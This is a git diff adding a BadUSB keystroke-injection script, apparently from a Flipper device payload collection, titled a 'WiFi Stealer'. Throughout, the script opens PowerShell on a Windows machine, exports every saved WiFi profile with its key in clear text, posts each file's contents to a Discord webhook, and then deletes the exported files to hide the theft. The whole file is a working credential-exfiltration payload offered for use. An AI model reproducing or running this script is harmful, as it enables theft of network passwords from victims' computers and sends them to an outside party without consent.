diff --git a/BadUSB/Wifi-Stealer-Discord-Improved.txt b/BadUSB/Wifi-Stealer-Discord-Improved.txt new file mode 100644 index 00000000..81c9c44e --- /dev/null +++ b/BadUSB/Wifi-Stealer-Discord-Improved.txt @@ -0,0 +1,58 @@ +REM Title: Doggo WiFi Stealer Using Discord Webhook +REM Author: MHooijberg +REM Version: 1.0 +REM Target: Windows 7/8/10/11 +REM Category: Grabber +REM Inspiration: https://github.com/UberGuidoZ/Flipper/blob/main/BadUSB/Wifi-Stealer_Discord.txt +REM Description: Extracts the SSID and wifi shared keys to xml files and send it to discord webhook. +REM Runtime: (468 * N) + ((220 * N + 500ms) * (# Of WiFi Networks)). Where N is the input duration of each character +GUI r +DELAY 500 +ALTSTRING powershell +ENTER +DELAY 2000 +REM Save the Discord Webhook Endpoint in an variable. +ALTSTRING $webhookUri = 'https://discord.com/api/webhooks/1065739856799617054/' +ENTER +REM Creating a new folder in Temp with random name to store the xml files. +ALTSTRING New-Item -Path $env:temp -Name "476F6F6420426F7921" -ItemType "directory" +ENTER +REM Set the currend working directory to the temporary local appdata folder. +ALTSTRING Set-Location -Path "$env:temp/476F6F6420426F7921" +ENTER +REM Export all WiFi credentials. +ALTSTRING netsh wlan export profile key=clear; +ENTER +REM Change the directory path so that the exported files can be deleted later. +ALTSTRING Set-Location -Path $env:temp +ENTER +REM Get all child files +ALTSTRING Get-ChildItem "$env:tmp/476F6F6420426F7921" -File | +ENTER +ALTSTRING ForEach-Object { +ENTER +REM Get the file content from the newly created file on the desktop. +ALTSTRING $fileContent = Get-Content $_.FullName | Out-String +ENTER +REM Create a body for the endpoint request. +ALTSTRING $Body = @{ +ENTER +ALTSTRING 'username' = '{Type:"Doggo", Nametag:"Haxor"}' +ENTER +ALTSTRING 'content' = '```xml' + "`n" + $fileContent + '```' +ENTER +ALTSTRING } +ENTER +REM Send a post request to the Uri with the specified body. +ALTSTRING Invoke-RestMethod -Uri $webhookUri -Method 'post' -Body $Body +ENTER +REM Wait for 0.3 seconds. +STRING Start-Sleep -Milliseconds 300 +ALTSTRING } +ENTER +REM Remove all exported WiFi files. +ALTSTRING Remove-Item -Path "$env:tmp/476F6F6420426F7921" -Force -Recurse +ENTER +REM Exit powershell. +ALTSTRING exit +ENTER \ No newline at end of file